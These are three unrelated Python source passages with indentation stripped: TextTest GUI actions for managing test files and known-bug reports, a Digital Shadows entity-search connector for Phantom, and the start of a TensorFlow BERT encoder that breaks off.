header.set_markup(text + "\n")
vbox.pack_start(header, expand=False, fill=False)
def getDirectoryText(self, test):
relDir = plugins.relpath(self.creationDir, test.getDirectory())
if relDir:
return "Create or import files in test subdirectory '" + relDir + "'"
else:
return "Create or import files in the test directory"
def notifyFileCreationInfo(self, creationDir, fileType):
self.fileChooser = None
if fileType == "external":
self.creationDir = None
self.setSensitivity(False)
else:
self.creationDir = creationDir
newActive = creationDir is not None
self.setSensitivity(newActive)
if newActive:
self.updateStems(fileType)
self.defaultAppendAppName = (fileType == "definition" or fileType == "standard")
self.updateAppendAppName(self.defaultAppendAppName)
def updateAppendAppName(self, setting):
self.appendAppName = setting
self.optionGroup.setValue("act", int(setting))
def findAllStems(self, fileType):
if fileType == "definition":
return self.getDefinitionFiles()
elif fileType == "data":
return self.currTestSelection[0].getDataFileNames()
elif fileType == "standard":
return self.getStandardFiles()
else:
return []
def getDefinitionFiles(self):
defFiles = []
defFiles.append("environment")
defFiles.append("config")
defFiles.append("options")
for interpreter in self.currTestSelection[0].getConfigValue("interpreters").keys():
defFiles.append(interpreter + "_options")
if self.currTestSelection[0].classId() == "test-case":
recordMode = self.currTestSelection[0].getConfigValue("use_case_record_mode")
if recordMode == "disabled":
namingScheme = self.currTestSelection[0].getConfigValue("filename_convention_scheme")
defFiles.append(self.currTestSelection[0].app.getStdinName(namingScheme))
else:
defFiles.append("usecase")
# We only want to create files this way that
# (a) are not created and understood by TextTest itself ("builtin")
# (b) are not auto-generated ("regenerate")
# That leaves the rest ("default")
return defFiles + self.currTestSelection[0].expandedDefFileStems("default")
def getStandardFiles(self):
app = self.currTestSelection[0].app
collateKeys = app.getConfigValue("collate_file").keys()
# Don't pick up "dummy" indicators on Windows...
namingScheme = app.getConfigValue("filename_convention_scheme")
stdFiles = [ app.getStdoutName(namingScheme), app.getStderrName(namingScheme) ] + filter(lambda k: k, collateKeys)
discarded = [ "stacktrace" ] + app.getConfigValue("discard_file")
return filter(lambda f: f not in discarded, stdFiles)
def updateStems(self, fileType):
stems = self.findAllStems(fileType)
if len(stems) > 0:
self.optionGroup.setValue("stem", stems[0])
else:
self.optionGroup.setValue("stem", "")
self.optionGroup.setPossibleValues("stem", stems)
def getFileName(self, stem, version, appendAppName=False):
fileName = stem
if self.appendAppName or appendAppName:
fileName += "." + self.currTestSelection[0].app.name
if version:
fileName += "." + version
return fileName
def performOnCurrent(self):
stem = self.optionGroup.getOptionValue("stem")
version = self.optionGroup.getOptionValue("v")
action = self.optionGroup.getSwitchValue("act")
test = self.currTestSelection[0]
if action > 0: # Create new
targetPath = self.getTargetPath(stem, version)
if os.path.exists(targetPath):
raise plugins.TextTestError, "Not creating file or directory : path already exists:\n" + targetPath
if action == 1:
plugins.ensureDirExistsForFile(targetPath)
file = open(targetPath, "w")
file.close()
test.refreshFiles()
self.newFileInfo = targetPath, False
elif action == 2:
plugins.ensureDirectoryExists(targetPath)
test.filesChanged()
else:
sourcePath = self.optionGroup.getOptionValue("src")
appendAppName = os.path.basename(sourcePath).startswith(stem + "." + test.app.name)
targetPath = self.getTargetPath(stem, version, appendAppName)
plugins.ensureDirExistsForFile(targetPath)
fileExisted = os.path.exists(targetPath)
plugins.copyPath(sourcePath, targetPath)
self.newFileInfo = targetPath, fileExisted
def endPerform(self):
# Shouldn't start new actions until the current ones complete, framework doesn't like it
guiplugins.ActionDialogGUI.endPerform(self)
fileName, existed = self.newFileInfo
if fileName:
self.notify("NewFile", fileName, existed)
self.newFileInfo = (None, False)
class RemoveTests(guiplugins.ActionGUI):
def __init__(self, *args, **kw):
self.distinctTestCount = 0
guiplugins.ActionGUI.__init__(self, *args, **kw)
def isActiveOnCurrent(self, *args):
return any((test.parent for test in self.currTestSelection))
def getActionName(self):
return "Remove Tests"
def _getTitle(self):
return "Remove Tests..."
def _getStockId(self):
return "delete"
def getTooltip(self):
return "Remove selected tests"
def getTestCountDescription(self):
desc = plugins.pluralise(self.distinctTestCount, "test")
diff = len(self.currTestSelection) - self.distinctTestCount
if diff > 0:
desc += " (with " + plugins.pluralise(diff, "extra instance") + ")"
return desc
def updateSelection(self, tests, apps, rowCount, *args):
self.distinctTestCount = rowCount
return guiplugins.ActionGUI.updateSelection(self, tests, apps, rowCount, *args)
def getFileRemoveWarning(self):
return "This will remove files from the file system and hence may not be reversible."
def getConfirmationMessage(self):
extraLines = "\n\nNote: " + self.getFileRemoveWarning() + "\n\nAre you sure you wish to proceed?\n"""
currTest = self.currTestSelection[0]
if len(self.currTestSelection) == 1:
if currTest.classId() == "test-case":
return "\nYou are about to remove the test '" + currTest.name + \
"' and all associated files." + extraLines
else:
return "\nYou are about to remove the entire test suite '" + currTest.name + \
"' and all " + str(currTest.size()) + " tests that it contains." + extraLines
else:
return "\nYou are about to remove " + self.getTestCountDescription() + \
" and all associated files." + extraLines
def getTestsToRemove(self, list):
toRemove = []
warnings = ""
for test in list:
if not test.parent:
warnings += "\nThe root suite\n'" + test.name + " (" + test.app.name + ")'\ncannot be removed.\n"
continue
if test.classId() == "test-suite":
subTests, subWarnings = self.getTestsToRemove(test.testcases)
warnings += subWarnings
for subTest in subTests:
if not subTest in toRemove:
toRemove.append(subTest)
if not test in toRemove:
toRemove.append(test)
return toRemove, warnings
def performOnCurrent(self):
namesRemoved = []
toRemove, warnings = self.getTestsToRemove(self.currTestSelection)
permMessage = "Failed to remove test: didn't have sufficient write permission to the test files"
for test in toRemove:
dir = test.getDirectory()
if os.path.isdir(dir):
plugins.tryFileChange(self.removePath, permMessage, dir)
if plugins.tryFileChange(test.remove, permMessage):
namesRemoved.append(test.name)
self.notify("Status", "Removed test(s) " + ",".join(namesRemoved))
if warnings:
self.showWarningDialog(warnings)
@staticmethod
def removePath(dir):
return plugins.removePath(dir)
def messageAfterPerform(self):
pass # do it as part of the method as currentTest will have changed by the end!
class RemoveTestsForPopup(RemoveTests):
def _getTitle(self):
return "Remove..."
def getActionName(self):
return "Remove Tests For Popup"
class RemoveFiles(guiplugins.ActionGUI):
def notifyFileCreationInfo(self, creationDir, fileType):
canRemove = fileType != "external" and \
(creationDir is None or len(self.currFileSelection) > 0) and \
self.isActiveOnCurrent()
self.setSensitivity(canRemove)
def isActiveOnCurrent(self, *args):
return len(self.currFileSelection) > 0
def getActionName(self):
return "Remove Files"
def _getTitle(self):
return "Remove..."
def _getStockId(self):
return "delete"
def getTooltip(self):
return "Remove selected files"
def getFileRemoveWarning(self):
return "This will remove files from the file system and hence may not be reversible."
def getConfirmationMessage(self):
extraLines = "\n\nNote: " + self.getFileRemoveWarning() + "\n\nAre you sure you wish to proceed?\n"""
test = self.getFirstTest()
return "\nYou are about to remove " + plugins.pluralise(len(self.currFileSelection), self.getType(self.currFileSelection[0][0])) + \
self.getTestSuffix(test) + "." + extraLines
def inConfigTab(self):
return isinstance(self.currFileSelection[0][1], list)
def getTestSuffix(self, test):
return " from the " + test.classDescription() + " '" + test.name + "'" if test else ""
@staticmethod
def removePath(dir):
return plugins.removePath(dir)
def getType(self, filePath):
if os.path.isdir(filePath):
return "directory"
else:
return "file"
def getFirstTest(self):
return self.currTestSelection[0] if not self.inConfigTab() else None
def performOnCurrent(self):
test = self.getFirstTest()
removed = 0
for filePath, _ in self.currFileSelection:
fileType = self.getType(filePath)
self.notify("Status", "Removing " + fileType + " " + os.path.basename(filePath))
self.notify("ActionProgress")
permMessage = "Insufficient permissions to remove " + fileType + " '" + filePath + "'"
if filePath.endswith(".shortcut"):
from storytext.replayer import ReplayScript
script = ReplayScript(filePath, False)
commands = "\n".join(script.commands)
self.notify("ShortcutRemove", ReplayScript.transformToRegexp(ReplayScript.tryToGetName(filePath)) + "\n renamed to " + commands + "\n")
if plugins.tryFileChange(self.removePath, permMessage, filePath):
removed += 1
if test:
test.filesChanged()
else:
self.appFilesChanged()
self.notify("Status", "Removed " + plugins.pluralise(removed, fileType) + self.getTestSuffix(test))
def getSignalsSent(self):
return [ "ReloadConfig", "ShortcutRemove" ]
def appFilesChanged(self):
appsSeen = set()
for _, apps in self.currFileSelection:
for app in apps:
if app not in appsSeen:
appsSeen.add(app)
app.refreshFiles()
self.notify("ReloadConfig")
def messageAfterPerform(self):
pass # do it as part of the method, uses lots of local data
class RepositionTest(guiplugins.ActionGUI):
def singleTestOnly(self):
return True
def _isActiveOnCurrent(self):
return guiplugins.ActionGUI.isActiveOnCurrent(self) and \
self.currTestSelection[0].parent and \
not self.currTestSelection[0].parent.autoSortOrder
def getSignalsSent(self):
return [ "RefreshTestSelection" ]
def performOnCurrent(self):
newIndex = self.findNewIndex()
test = self.currTestSelection[0]
permMessage = "Failed to reposition test: no permissions to edit the testsuite file"
if plugins.tryFileChange(test.parent.repositionTest, permMessage, test, newIndex):
self.notify("RefreshTestSelection")
else:
raise plugins.TextTestError, "\nThe test\n'" + test.name + "'\nis not present in the default version\nand hence cannot be reordered.\n"
class RepositionTestDown(RepositionTest):
def _getStockId(self):
return "go-down"
def _getTitle(self):
return "Move down"
def messageAfterPerform(self):
return "Moved " + self.describeTests() + " one step down in suite."
def getTooltip(self):
return "Move selected test down in suite"
def findNewIndex(self):
return min(self.currTestSelection[0].positionInParent() + 1, self.currTestSelection[0].parent.maxIndex())
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
return self.currTestSelection[0].parent.testcases[self.currTestSelection[0].parent.maxIndex()] != self.currTestSelection[0]
class RepositionTestUp(RepositionTest):
def _getStockId(self):
return "go-up"
def _getTitle(self):
return "Move up"
def messageAfterPerform(self):
return "Moved " + self.describeTests() + " one step up in suite."
def getTooltip(self):
return "Move selected test up in suite"
def findNewIndex(self):
return max(self.currTestSelection[0].positionInParent() - 1, 0)
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
return self.currTestSelection[0].parent.testcases[0] != self.currTestSelection[0]
class RepositionTestFirst(RepositionTest):
def _getStockId(self):
return "goto-top"
def _getTitle(self):
return "Move to first"
def messageAfterPerform(self):
return "Moved " + self.describeTests() + " to first in suite."
def getTooltip(self):
return "Move selected test to first in suite"
def findNewIndex(self):
return 0
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
return self.currTestSelection[0].parent.testcases[0] != self.currTestSelection[0]
class RepositionTestLast(RepositionTest):
def _getStockId(self):
return "goto-bottom"
def _getTitle(self):
return "Move to last"
def messageAfterPerform(self):
return "Moved " + repr(self.currTestSelection[0]) + " to last in suite."
def getTooltip(self):
return "Move selected test to last in suite"
def findNewIndex(self):
return self.currTestSelection[0].parent.maxIndex()
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
currLastTest = self.currTestSelection[0].parent.testcases[len(self.currTestSelection[0].parent.testcases) - 1]
return currLastTest != self.currTestSelection[0]
class RenameAction(guiplugins.ActionDialogGUI):
def singleTestOnly(self):
return True
def _getStockId(self):
return "italic"
def _getTitle(self):
return "_Rename..."
def messageAfterPerform(self):
pass # Use method below instead.
def basicNameCheck(self, newName):
if len(newName) == 0:
raise plugins.TextTestError, "Please enter a new name."
if " " in newName:
raise plugins.TextTestError, "The new name must not contain spaces, please choose another name."
def performOnCurrent(self):
try:
newName = self.optionGroup.getOptionValue("name")
self.basicNameCheck(newName)
self.performRename(newName)
except (IOError, OSError), e:
self.showErrorDialog("Failed to " + self.getActionName().lower() + ":\n" + str(e))
@staticmethod
def movePath(oldPath, newPath):
# overridden by version control modules
os.rename(oldPath, newPath)
class RenameTest(RenameAction):
def __init__(self, *args):
RenameAction.__init__(self, *args)
self.addOption("name", "\nNew name")
self.addOption("desc", "\nNew description", multilineEntry=True)
self.oldName = ""
self.oldDescription = ""
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.5, 0.36
def isActiveOnCurrent(self, *args):
# Don't allow renaming of the root suite
return guiplugins.ActionGUI.isActiveOnCurrent(self, *args) and bool(self.currTestSelection[0].parent)
def updateOptions(self):
self.oldName = self.currTestSelection[0].name
self.oldDescription = self.currTestSelection[0].description
self.optionGroup.setOptionValue("name", self.oldName)
self.optionGroup.setOptionValue("desc", self.oldDescription)
return True
def fillVBox(self, vbox, group):
header = gtk.Label()
header.set_markup("<b>" + plugins.convertForMarkup(self.oldName) + "</b>")
vbox.pack_start(header, expand=False, fill=False)
return guiplugins.ActionDialogGUI.fillVBox(self, vbox, group)
def getTooltip(self):
return "Rename selected test"
def getActionName(self):
return "Rename Test"
def getNameChangeMessage(self, newName):
return "Renamed test " + self.oldName + " to " + newName
def getChangeMessage(self, newName, newDesc):
if self.oldName != newName:
message = self.getNameChangeMessage(newName)
if self.oldDescription != newDesc:
message += " and changed description."
else:
message += "."
elif newDesc != self.oldDescription:
message = "Changed description of test " + self.oldName + "."
else:
message = "Nothing changed."
return message
def checkNewName(self, newName):
if newName != self.oldName:
for test in self.currTestSelection[0].parent.testCaseList():
if test.name == newName:
raise plugins.TextTestError, "The name '" + newName + "' is already taken, please choose another name."
newDir = os.path.join(self.currTestSelection[0].parent.getDirectory(), newName)
if os.path.isdir(newDir):
self.handleExistingDirectory(newDir)
def handleExistingDirectory(self, newDir): # In CVS we might need to override this...
raise plugins.TextTestError, "The directory " + newDir + " already exists, please choose another name."
def performRename(self, newName):
self.checkNewName(newName)
newDesc = self.optionGroup.getOptionValue("desc")
if newName != self.oldName or newDesc != self.oldDescription:
for test in self.currTestSelection:
# Do this first, so that if we fail we won't update the test suite files either
self.moveFiles(test, newName)
test.rename(newName, newDesc)
changeMessage = self.getChangeMessage(newName, newDesc)
self.oldName = newName
self.oldDescription = newDesc
self.notify("Status", changeMessage)
def moveFiles(self, test, newName):
# Create new directory, copy files if the new name is new (we might have
# changed only the comment ...)
if test.name != newName:
oldDir = test.getDirectory()
newDir = test.parent.getNewDirectoryName(newName)
if os.path.isdir(oldDir):
self.movePath(oldDir, newDir)
class RenameFile(RenameAction):
def __init__(self, *args):
RenameAction.__init__(self, *args)
self.addOption("name", "\nNew name for file")
self.oldName = ""
self.configAppList = []
def notifyFileCreationInfo(self, creationDir, fileType):
canRename = fileType != "external" and \
(creationDir is None or len(self.currFileSelection) > 0) and \
self.isActiveOnCurrent()
self.setSensitivity(canRename)
def isActiveOnCurrent(self, *args):
return len(self.currFileSelection) == 1
def singleTestOnly(self):
return True
def updateOptions(self):
self.oldName = os.path.basename(self.currFileSelection[0][0])
associatedObj = self.currFileSelection[0][1]
self.configAppList = associatedObj if isinstance(associatedObj, list) else []
self.optionGroup.setOptionValue("name", self.oldName)
return True
def getSignalsSent(self):
return [ "ReloadConfig", "ShortcutRename" ]
def _getStockId(self):
return "italic"
def getActionName(self):
return "Rename File"
def _getTitle(self):
return "_Rename..."
def getTooltip(self):
return "Rename selected file"
def messageAfterPerform(self):
pass # Use method below instead.
def getNameChangeMessage(self, newName):
return "Renamed file " + self.oldName + " to " + newName + "."
def checkNewName(self, newName, newPath):
if newName == self.oldName:
raise plugins.TextTestError, "Please enter a new name."
if os.path.exists(newPath):
raise plugins.TextTestError, "There is already a file or directory at '" + newName + "', please choose another name."
def getConfirmationMessage(self):
oldStem = self.oldName.split(".")[0]
newName = self.optionGroup.getOptionValue("name")
newStem = newName.split(".")[0]
if self.isDefinitionFileStem(oldStem) and not self.isDefinitionFileStem(newStem):
return "You are trying to rename a definition file in such a way that it will no longer fulfil its previous purpose.\nTextTest uses conventional names for files with certain purposes and '" + oldStem + "' is one such conventional name.\nAre you sure you want to continue?"
elif self.oldName.endswith(".shortcut"):
if not newName.endswith(".shortcut"):
return "A shortcut file name should end with '.shortcut'\nYou are trying to rename it with another extension\nAre you sure you want to continue?"
elif self.oldName.count("$") != newName.count("$"):
return "The number of shortcut arguments seems to be different.\nAre you sure you want to continue?"
else:
return ""
def isDefinitionFileStem(self, stem):
if self.configAppList:
return stem == "config"
else:
return self.currTestSelection[0].isDefinitionFileStem(stem)
def performRename(self, newName):
oldPath = self.currFileSelection[0][0]
newPath = os.path.join(os.path.dirname(oldPath), newName)
self.checkNewName(newName, newPath)
self.movePath(oldPath, newPath)
if self.configAppList:
for app in self.configAppList:
app.refreshFiles()
self.notify("ReloadConfig")
else:
self.currTestSelection[0].filesChanged()
changeMessage = self.getNameChangeMessage(newName)
if self.oldName.endswith(".shortcut") and newName.endswith(".shortcut"):
from storytext.replayer import ReplayScript
self.notify("ShortcutRename", ReplayScript.transformToRegexp(ReplayScript.tryToGetName(self.oldName)) + " renamed to " + ReplayScript.tryToGetName(newName))
self.oldName = newName
self.notify("Status", changeMessage)
class SortTestSuiteFileAscending(guiplugins.ActionGUI):
def singleTestOnly(self):
return True
def correctTestClass(self):
return "test-suite"
def isActiveOnCurrent(self, *args):
return guiplugins.ActionGUI.isActiveOnCurrent(self, *args) and not self.currTestSelection[0].autoSortOrder
def _getStockId(self):
return "sort-ascending"
def _getTitle(self):
return "_Sort Test Suite File"
def messageAfterPerform(self):
return "Sorted testsuite file for " + self.describeTests() + " in alphabetical order."
def getTooltip(self):
return "sort testsuite file for the selected test suite in alphabetical order"
def performOnCurrent(self):
self.performRecursively(self.currTestSelection[0], True)
def performRecursively(self, suite, ascending):
# First ask all sub-suites to sort themselves
if guiutils.guiConfig.getValue("sort_test_suites_recursively"):
for test in suite.testcases:
if test.classId() == "test-suite":
self.performRecursively(test, ascending)
self.notify("Status", "Sorting " + repr(suite))
self.notify("ActionProgress")
if self.hasNonDefaultTests():
self.showWarningDialog("\nThe test suite\n'" + suite.name + "'\ncontains tests which are not present in the default version.\nTests which are only present in some versions will not be\nmixed with tests in the default version, which might lead to\nthe suite not looking entirely sorted.")
suite.sortTests(ascending)
def hasNonDefaultTests(self):
if len(self.currTestSelection) == 1:
return False
for extraSuite in self.currTestSelection[1:]:
for test in extraSuite.testcases:
if not self.currTestSelection[0].findSubtest(test.name):
return True
return False
class SortTestSuiteFileDescending(SortTestSuiteFileAscending):
def _getStockId(self):
return "sort-descending"
def _getTitle(self):
return "_Reversed Sort Test Suite File"
def messageAfterPerform(self):
return "Sorted testsuite file for " + self.describeTests() + " in reversed alphabetical order."
def getTooltip(self):
return "sort testsuite file for the selected test suite in reversed alphabetical order"
def performOnCurrent(self):
self.performRecursively(self.currTestSelection[0], False)
class ReportBugs(guiplugins.ActionDialogGUI):
def __init__(self, allApps, *args):
guiplugins.ActionDialogGUI.__init__(self, allApps, *args)
self.textGroup = plugins.OptionGroup("Search for")
self.searchGroup = plugins.OptionGroup("Search in")
self.applyGroup = plugins.OptionGroup("Additional options to only apply to certain runs")
self.bugSystemGroup = plugins.OptionGroup("Link failure to a reported bug")
self.textDescGroup = plugins.OptionGroup("Link failure to a textual description")
self.textGroup.addOption("search_string", "Text or regexp to match", multilineEntry=True)
self.textGroup.addSwitch("use_regexp", "Enable regular expressions", 1)
self.textGroup.addSwitch("trigger_if", name="Trigger if", options=["Present", "NOT present", "Exactly as given"])
self.searchGroup.addSwitch("data_source", options = [ "Specific file", "Brief text/details", "Full difference report" ], description = [ "Search in a newly generated file (not its diff)", "Search in the brief text describing the test result as it appears in the Details column in the dynamic GUI test view", "Search in the whole difference report as it appears in the lower right window in the dynamic GUI" ])
self.searchGroup.addOption("search_file", "File to search in")
self.searchGroup.addSwitch("ignore_other_errors", "Trigger even if other files differ", description="By default, this bug is only enabled if only the provided file is different. Check this box to enable it irrespective of what other difference exist. Note this increases the chances of it being reported erroneously and should be used carefully.")
self.searchGroup.addSwitch("trigger_on_success", "Trigger even if file to search would otherwise compare as equal", description="By default, this bug is only enabled if a difference is detected in the provided file to search. Check this box to search for it even if the file compares as equal.")
self.applyGroup.addOption("version", "\nVersion to report for")
self.applyGroup.addOption("execution_hosts", "Trigger only when run on machine(s)")
self.bugSystemGroup.addOption("bug_system", "\nExtract info from bug system", "<none>", self.findBugSystems(allApps))
self.bugSystemGroup.addOption("bug_id", "Bug ID")
self.textDescGroup.addOption("full_description", "\nFull description")
self.textDescGroup.addOption("brief_description", "Few-word summary")
self.textDescGroup.addSwitch("internal_error", "Report as 'internal error' rather than 'known bug'")
self.optionGroup.addOption("rerun_count", "Number of times to try to rerun the test if the issue is triggered", 0)
def isModal(self):
return False # Want to be able to select text from the main GUI while we're in the dialog
def fillVBox(self, vbox, optionGroup):
if optionGroup is self.optionGroup:
for group in [ self.textGroup, self.searchGroup, self.applyGroup ]:
if group is self.applyGroup:
widget = self.createExpander(group)
else:
widget = self.createFrame(group, group.name)
vbox.pack_start(widget, fill=False, expand=False, padding=8)
vbox.pack_start(gtk.HSeparator(), padding=8)
header = gtk.Label()
header.set_markup("<u>Fill in exactly <i>one</i> of the sections below</u>\n")
vbox.pack_start(header, expand=False, fill=False, padding=8)
for group in [ self.bugSystemGroup, self.textDescGroup ]:
frame = self.createFrame(group, group.name)
vbox.pack_start(frame, fill=False, expand=False, padding=8)
return guiplugins.ActionDialogGUI.fillVBox(self, vbox, optionGroup)
def createExpander(self, group):
expander = gtk.Expander(group.name)
expander.add(self.createGroupBox(group))
return expander
def createRadioButtons(self, *args):
buttons = guiplugins.ActionDialogGUI.createRadioButtons(self, *args)
buttons[0].connect("toggled", self.dataSourceChanged)
return buttons
def dataSourceChanged(self, *args):
sensitive = not self.searchGroup.getOptionValue("data_source")
self.setGroupSensitivity(self.searchGroup, sensitive)
def findBugSystems(self, allApps):
bugSystems = []
for app in allApps:
for appSystem in app.getConfigValue("bug_system_location").keys():
if appSystem not in bugSystems:
bugSystems.append(appSystem)
return bugSystems
def _getStockId(self):
return "info"
def _getTitle(self):
return "Enter Failure Information"
def getDialogTitle(self):
return "Enter information for automatic interpretation of test failures"
def getDefaultSearchFile(self, possibleValues):
logFileStems = set([ test.getConfigValue("log_file") for test in self.currTestSelection ])
for logFileStem in logFileStems:
if logFileStem in possibleValues:
return logFileStem
return possibleValues[0]
def _cleanDialog(self, *args):
self.searchGroup.getOption("search_file").resetDefault()
guiplugins.ActionDialogGUI._cleanDialog(self, *args)
def updateOptions(self):
possibleValues = self.getPossibleFileStems()
if possibleValues:
self.searchGroup.setOptionValue("search_file", self.getDefaultSearchFile(possibleValues))
self.searchGroup.setPossibleValues("search_file", possibleValues)
return False
def getPossibleFileStems(self):
stems = []
for testOrSuite in self.currTestSelection:
excludeStems = testOrSuite.expandedDefFileStems()
for test in testOrSuite.testCaseList():
for stem in test.dircache.findAllStems():
if stem not in stems and stem not in excludeStems:
stems.append(stem)
return stems
def checkSanity(self):
searchStr = self.textGroup.getOptionValue("search_string")
if len(searchStr) == 0:
raise plugins.TextTestError, "Must fill in the field 'text or regexp to match'"
elif searchStr.startswith(" "):
raise plugins.TextTestError, "'Knownbugs' file format cannot handle leading spaces in search string.\n" + \
"If the line starts with spaces, suggest to add a ^ at the start, to match the beginning of the line"
if self.bugSystemGroup.getOptionValue("bug_system") == "<none>":
if len(self.textDescGroup.getOptionValue("full_description")) == 0 or \
len(self.textDescGroup.getOptionValue("brief_description")) == 0:
raise plugins.TextTestError, "Must either provide a bug system or fill in both description and summary fields"
else:
if len(self.bugSystemGroup.getOptionValue("bug_id")) == 0:
raise plugins.TextTestError, "Must provide a bug ID if bug system is given"
def versionSuffix(self):
version = self.applyGroup.getOptionValue("version")
if len(version) == 0:
return ""
else:
return "." + version
def getFiles(self, ancestors):
fileNames = []
for ancestor in ancestors:
name = "knownbugs." + ancestor.app.name + self.versionSuffix()
fileName = os.path.join(ancestor.getDirectory(), name)
if not any((fileName.startswith(f) for f in fileNames)):
fileNames.append(fileName)
return [ open(fileName, "a") for fileName in fileNames ]
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.6, 0.6
@classmethod
def updateAncestors(cls, ancestors, test):
for i, ancestor in enumerate(ancestors):
newAncestor = ancestor.findCommonAncestor(test)
if newAncestor:
ancestors[i] = newAncestor
return True
return False
@classmethod
def findCommonSelectedAncestors(cls, tests):
ancestors = [ tests[0] ]
for test in tests[1:]:
if not cls.updateAncestors(ancestors, test):
ancestors.append(test)
return ancestors
def performOnCurrent(self):
self.checkSanity()
dataSourceText = { 1 : "brief_text", 2 : "free_text" }
triggerText = {1 : "trigger_on_absence", 2 : "trigger_on_identical"}
namesToIgnore = [ "version" ]
ancestors = self.findCommonSelectedAncestors(self.currTestSelection)
for writeFile in self.getFiles(ancestors):
writeFile.write("\n[Reported by " + os.getenv("USER", "Windows") + " at " + plugins.localtime() + "]\n")
for group in [ self.textGroup, self.searchGroup, self.applyGroup,
self.bugSystemGroup, self.textDescGroup, self.optionGroup ]:
for name, option in group.options.items():
value = option.getValue()
if name in namesToIgnore or self.hasDefaultValue(name, value):
continue
if name == "data_source":
writeFile.write("search_file:" + dataSourceText[value] + "\n")
namesToIgnore += [ "search_file", "trigger_on_success", "ignore_other_errors" ]
elif name == "trigger_if":
writeFile.write(triggerText[value] + ":" + "1\n")
else:
writeFile.write(name + ":" + str(value).replace("\n", "\\n") + "\n")
self.updateWithBugFile(writeFile, ancestors)
writeFile.close()
self.setFilesChanged(ancestors)
def hasDefaultValue(self, name, value):
if name == "use_regexp":
return value == 1
else:
return not value or value in [ "0", "<none>" ]
def updateWithBugFile(self, *args):
pass # only used in dynamic GUI
def setFilesChanged(self, ancestors):
for ancestor in ancestors:
ancestor.filesChanged()
def getInteractiveActionClasses():
return [ CopyTests, CutTests, PasteTests,
ImportTestCase, ImportTestSuite, ImportApplication, ImportFiles,
RenameTest, RenameFile, RemoveTests, RemoveTestsForPopup, RemoveFiles, ReportBugs,
SortTestSuiteFileAscending, SortTestSuiteFileDescending,
RepositionTestFirst, RepositionTestUp, RepositionTestDown, RepositionTestLast ]
|
# File: ds_search_entities_connector.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
import phantom.app as phantom
from phantom.action_result import ActionResult
from digital_shadows_consts import *
from dsapi.service.search_entities_service import SearchEntitiesService
from exception_handling_functions import ExceptionHandling
class DSSearchEntitiesConnector(object):
def __init__(self, connector):
"""
:param connector: DigitalShadowsConnector
"""
self._connector = connector
config = connector.get_config()
self._handle_exception_object = ExceptionHandling()
self._ds_api_key = config[DS_API_KEY_CFG]
self._ds_api_secret_key = config[DS_API_SECRET_KEY_CFG]
def search_entities(self, param):
action_result = ActionResult(dict(param))
self._connector.add_action_result(action_result)
self._connector.save_progress("process started...!!! ")
# type = param.get('types').split(',')
type = ["CLIENT_INCIDENT", "DATA_BREACH", "AGGREGATE_DATA_BREACH", "INTELLIGENCE", "TECHNICAL_SOURCE", "WEB_SOURCE"]
date_range = param.get('date_range')
query = param.get('query')
"""
incident_types = param.get('incident_types')
incident_subtypes = param.get('incident_subtypes')
incident_severities = param.get('incident_severities')
web_page_networks = param.get('web_page_networks')
forum_post_networks = param.get('forum_post_networks')
marketplace_listing_networks = param.get('marketplace_listing_networks')
market_places = param.get('marketplaces')
chat_protocols = param.get('chat_protocols')
chat_servers = param.get('chat_servers')
chat_channels = param.get('chat_channels')
threat_level_types = param.get('threat_level_types')
web_page_site_categories = param.get('web_page_site_categories')
forum_post_site_categories = param.get('forum_post_site_categories')
blog_names = param.get('blog_names')
date_period = param.get('date_period')
start_date = param.get('from')
end_date = param.get('until')
"""
try:
search_service = SearchEntitiesService(self._ds_api_key, self._ds_api_secret_key)
except Exception as e:
error_message = self._handle_exception_object.get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, "{0} {1}".format(SERVICE_ERR_MSG, error_message))
try:
search_view = search_service.search_entity_view(dateRange=date_range, query_string=query, types=type)
except Exception as e:
error_message = self._handle_exception_object.get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. {0}".format(error_message))
"""
search_view = search_service.search_entity_view(types=type, dateRange=date_range, incidentTypes=incident_types, incidentSubtypes=incident_subtypes,
incidentSeverities=incident_severities, webPageNetworks=web_page_networks,
forumPostNetworks=forum_post_networks, marketplaceListingNetworks=marketplace_listing_networks,
marketplaces=market_places, chatProtocols=chat_protocols, chatServers=chat_servers,
chatChannels=chat_channels, threatLevelTypes=threat_level_types,
webPageSiteCategories=web_page_site_categories, forumPostSiteCategories=forum_post_site_categories,
blogNames=blog_names, datePeriod=date_period, from_date=start_date,
until=end_date, query_string=query)
"""
self._connector.save_progress("View: {}".format(search_view))
try:
search_entity_pages = search_service.find_all_pages(view=search_view)
# self._connector.save_progress("entity: " + str(search_entity_pages))
entity_total = len(search_entity_pages)
except StopIteration:
error_message = 'No Search Entity objects retrieved from the Digital Shadows API in page groups'
return action_result.set_status(phantom.APP_ERROR, "Error Details: {0}".format(error_message))
except Exception as e:
error_message = self._handle_exception_object.get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. {}".format(error_message))
if entity_total > 0:
summary = {
'entity_count': entity_total,
'entity_found': True
}
action_result.update_summary(summary)
for entity_page in search_entity_pages:
for entity in entity_page:
# self._connector.save_progress("entity payload: " + str(entity.payload))
action_result.add_data(entity.payload)
action_result.set_status(phantom.APP_SUCCESS, 'String search entities are fetched')
else:
summary = {
'entity_count': 0,
'entity_found': False
}
action_result.update_summary(summary)
action_result.set_status(phantom.APP_SUCCESS, 'Entities not found for search string')
return action_result.get_status()
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib as tc
from . import encoder
from utils import util
def bert_encoder(sequence, params):
# extract sequence mask information
seq_mask = 1. - tf.to_float(tf.equal(sequence, params.bert.vocab.pad))
# extract segment information
seg_pos = tf.to_float(tf.equal(sequence, params.bert.vocab.sep))
seg_ids = tf.cumsum(seg_pos, axis=1, reverse=True)
seg_num = tf.reduce_sum(seg_pos, axis=1, keepdims=True)
seg_ids = seg_num - seg_ids
seg_ids = tf.to_int32(seg_ids * seq_mask)
# sequence length information
seq_shp = util.shape_list(sequence)
batch_size, seq_length = seq_shp[:2]
def custom_getter(getter, name, *args, **kwargs):
